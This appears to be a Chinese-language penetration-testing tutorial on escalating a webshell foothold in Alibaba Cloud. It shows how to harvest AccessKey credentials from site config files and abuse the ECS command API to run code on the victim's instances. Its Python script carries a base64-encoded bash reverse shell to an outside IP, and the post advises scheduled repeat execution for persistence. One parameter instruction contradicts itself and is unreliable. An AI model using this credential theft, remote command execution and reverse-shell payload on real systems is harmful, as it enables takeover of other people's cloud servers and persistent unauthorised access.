0x00前言
q:在获得权限较低的webshell情况下,如何继续扩大收获(前提是对方把服务器上到公有云上了)
a:其实当我们拿到shell后,基本上第一件事都是去信息搜集,其中包括,主机信息搜集,域信息搜集等等,然后再去分析
1.是否需要提权
2.如何去将流量带入(转发)
3结合信息搜集的信息转化出去、其他更好的思路
这里我们就说的是第三种情况
tip:内网渗透一般提权是最不可取的方案,我们只需要不断地信息搜集,撕开流量的口子(才知道)
0x01 阿里云对象存储-oss
什么是对象存储?
阿里云对象存储服务,是阿里云对外提供的海量,安全,低成本,高可靠的云存储服务。我们可以通过文档停工的rest接口,去在任何时间和地点进行上传和下载。基于oss,我们可以搭建出各种多媒体分享网站,网盘,个人数据和企业数据备份等基于大规模数据的服务。
情景:我们通过webshell在目标机器(linux)的web站点目录下发现多个子站的配置文件config.php,配置了同一个阿里云的oss地址,只是存储空间不同(Bucket)
通常情况一个阿里云oss地址的组成如下:
http(s)://[BucketName].oss-cn-[Region].aliyuncs.com
BucketName:存储空间
Region:地域
eg:杭州=cn-hangzhou
0x02 Access Token
Access Token = AccessKeyId +AccessKeySecret(之前看过一篇文章说是access token具有一定的时间要求)
oss通过使用keyid/keysecret对称加密方法来验证某个请求的发送者信息身份。
accesskid用于标识用户(我上篇文章说到这里存在漏洞),accesskeysecret是用户用于加密的方法来验证某个请求的发送者身份。
accesskeyid用于标识用户,accesskeysecret是用户用于加密签名字符串和oss用来验证签名字符串的密钥,其中accesskeysecret必须保密,只有用户和oss知道。AccessKey根据所属的账号的类型有所区分。
0x03 通过Access Token接管esc(这里其实是通过阿里云提供的一个python调用接口)
前面介绍到,默认情况下,阿里云用户获得Access Token是对当前所有服务通用的令牌,在没有使用ram账户(登陆账户)的情况下,就可以使用sdk去操作所有的云产品。
首先通过读取配置文件,获得了同于上传图片所需要认证的access token,如何检验是否可用的呢?
下面可以直接调用ecs实列的api即可,以往情况下,会使用python,直接安装阿里云的sdk-core,但是现在能在线调试,大大的节省了本地调试的成本
只有第一个Region是必须填的,点击api explorer可以直接进入调试环境
服务器上的oss配置中是由Regionld,我就直接选择了,然后填入access token信息,就可以获得数据。
也可以直接复制一份运行他这个输出的json格式有点类似于elk节点的json格式分布式的
命令执行:
首先创建一条命令,然后指定实例来调用命令
手册参考:https://help.aliyun.com/document_detail/64844.html
由于都是linux,所以我们选择RunShellScript,注意:命令必须是base64encode
具体执行代码如下
#!/usr/bin/env python #coding=utf-8 from aliyunsdkcore.client import AcsClient from aliyunsdkcore.acs_exception.exceptions import ClientException from aliyunsdkcore.acs_exception.exceptions import ServerException from aliyunsdkecs.request.v20140526.CreateCommandRequest import CreateCommandRequest client = AcsClient('<accessKeyId>', '<accessSecret>', 'cn-shanghai') request = CreateCommandRequest() request.set_accept_format('json') request.set_Type("RunShellScript") request.set_CommandContent("YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzIzMzMgMD4mMQo=") request.set_Name("test") response = client.do_action_with_exception(request) # python2: print(response) print(str(response, encoding='utf-8'))
执行成功后会返回
{ "RequestId": "********-****-****-****-********", "CommandId": "c-0************" }
紧接着就是invokecommand
RegionId:区域ID,例如:cn-shanghai
CommandId:命令ID
InstanceId:实例ID
Timed:命令是否为周期执行。 默认值:False
Frequency:周期任务的执行周期,两次周期任务的时间间隔不能低于10秒。当参数 Timed 的值为 True 时,参数 Frequency 为必需参数。 该参数取值遵循Cron表达式,参阅Cron表达式。
默认情况下,我们不需要管后面的参数,如果需要权限维持的话,可以设置timed 为false
并且设置Frequence为定时任务计划表,执行的过程中基本上不会拦截。
学习内容来自:https://payloads.online/(倾旋师傅)